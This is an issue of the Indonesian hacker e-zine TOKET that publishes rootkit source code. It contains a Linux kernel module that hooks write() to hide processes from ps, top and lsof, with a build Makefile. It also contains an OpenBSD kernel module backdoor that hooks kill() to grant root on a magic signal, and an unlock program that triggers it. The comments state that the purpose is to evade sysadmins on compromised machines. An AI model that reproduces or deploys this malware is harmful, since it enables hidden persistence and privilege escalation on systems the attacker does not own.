Kecoak Elektronik Indonesia [ KEI ] http://www.kecoak-elektronik.net 24 Hours A Day, 300/1200 Baud Presents... #################################################################### TOKET - Terbitan Online Kecoak Elektronik Defending the classical hackers mind since 1995 Publisher : http://www.kecoak-elektronik.net Contact : staff@kecoak-elektronik.net #################################################################### x----- leah_dizzon_naked_on_my_bed_tonight_makes_me_so_horny.c -----x /* leah_dizzon_naked_on_my_bed_lastnight_makes_me_so_horny.c Straw Hat of Kecoak Elektronik Rootkit Collection "Loadable Kernel Module For Kernel 2.6.9", Ripping from Loadable Kernel By you dong-hun(Xpl017Elz) work for kernel 2.4.2, I just do some modifications to his code. I've tested this module on kernel 2.6.9-5.ELsmp (Red Hat Enterprise Linux Release 4) and worked well. */ #include /* slab.h is header file for kmalloc(), kfree() */ #include #include #include #include #include #include #include #define PROGPREFIX "h3ll" unsigned char progprefix[0x82]=PROGPREFIX; int have; unsigned long **sys_call_table; asmlinkage int (*or_write)(u_int fd,u_char *buf,u_int count); /* taken from http://downloads.securityfocus.com/downloads/scprint.tar.gz */ unsigned long **find_sys_call_table(void) { unsigned long **sctable; unsigned long ptr; extern int loops_per_jiffy; sctable = NULL; for (ptr = (unsigned long)&loops_per_jiffy; ptr < (unsigned long)&boot_cpu_data; ptr += sizeof(void *)){ unsigned long *p; p = (unsigned long *)ptr; if (p[__NR_close] == (unsigned long) sys_close){ sctable = (unsigned long **)p; return &sctable[0]; } } return NULL; } /* Modification of write syscall to spoof result of ps, pstree, lsof, and top. When you run program on compromised machine, "say it your scanner", faking process can be easily detected by sysadmin. Using this module we can hide our running program from output ps, pstree, lsof, and top. If sysadmin uses "grep", our running program will be detected. But it doesn't matter since sysadmin doesn't know what strings should be "grep"-ed by him. */ asmlinkage int fk_write(u_int fd,u_char *buf,u_int count) { char *kbuf=(char*)kmalloc(256,GFP_KERNEL); copy_from_user(kbuf,buf,255); if ((strstr(current->comm,"ps"))|| (strstr(current->comm,"pstree"))|| (strstr(current->comm,"top"))|| (strstr(current->comm,"lsof"))) { if(strstr(kbuf,progprefix)) { kfree(kbuf); return -ENOENT; } } kfree(kbuf); have=(*or_write)(fd,buf,count); return have; } int init_module(void) { sys_call_table = find_sys_call_table(); or_write=sys_call_table[__NR_write]; sys_call_table[__NR_write]=fk_write; return 0; } void cleanup_module(void) { sys_call_table[__NR_write]=or_write; } /* Hidding this module is your duty, because i don't want to disclose complete version of this loadable kernel module rootkit. */ x----------------------------- Makefile ------------------------------x obj-m += leah_dizzon_naked_on_my_bed_tonight_makes_me_so_horny.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean x------------------ OpenBSD_LKM_root_shell_spawn.c -------------------x x---------------------------x el8root.c x-----------------------------x /* OpenBSD root shell with LKM - kecoak-elektronik Sure, th1z idea has been exist for long time ago. THC has given us nice tutorial about FreeBSD LKM infoshacker/france and securitylab.ru has given us nice tutorial about OpenBSD LKM We just rewrite for u with some modificationz Nothing's new but still nice enough! Compile : cc -D_KERNEL -I/sys -c el8root.c Load to kernel: modload -o trojan.out -etrojan el8root.o */ #include #include #include #include #include #include #include #define UIDMAGIC 1003 #define SIGNALMAGIC 60 //we don't use sys/syscalargs.h struct sys_kill_args { int pid; int signum; }; int (*orig_kill)(struct proc *p, void *v, register_t *retval); int my_kill(struct proc *p, void *v, register_t *retval); MOD_MISC("trojan"); int my_kill(struct proc *p, void *v, register_t *retval) { struct sys_kill_args *args; struct proc* ourp; args = (struct sys_kill_args*)v; struct pcred *pc = p->p_cred; //We use cr_uid=0 means euid user 0 //but uid=MAGICUID //Why??because we can take some advantages of th1z //I think thiz link will usefull for u //http://ftp.fr.openbsd.org/pub/OpenBSD/src/sys/kern/kern_prot.c if(args->signum == SIGNALMAGIC){ ourp = (pfind(args->pid)); ourp->p_cred->pc_ucred->cr_uid = 0; ourp->p_cred->pc_ucred->cr_gid = 0; *retval = -EINVAL; return -EINVAL; }else{ return orig_kill(p,v,retval); } } int handler (struct lkm_table * lkmtp, int cmd) { switch(cmd) { case LKM_E_LOAD: //printf("syscall's modified\n"); (sy_call_t *)orig_kill = sysent[SYS_kill].sy_call; sysent[SYS_kill].sy_call = (sy_call_t *)my_kill; break; case LKM_E_UNLOAD: //printf("change to default syscall\n"); sysent[SYS_kill].sy_call = (sy_call_t *)orig_kill; break; case LKM_E_STAT: //printf("syscall's already changed .\n"); break; } return 0; } int trojan (struct lkm_table * lkmtp, int cmd, int ver) { DISPATCH(lkmtp, cmd, ver, handler, handler, lkm_nofunc); } x----------------------------x unlock.c x-----------------------------x /* Unlock user with UIDMAGIC to root Compile: cc -o unlock unlock.c Unlock: ./unlock $$ */ #include #include int main(int argc, char *argv[]) { if(argc<2)return -1; return kill(atoi(argv[1]),60); } x------------------------------- End -------------------------------x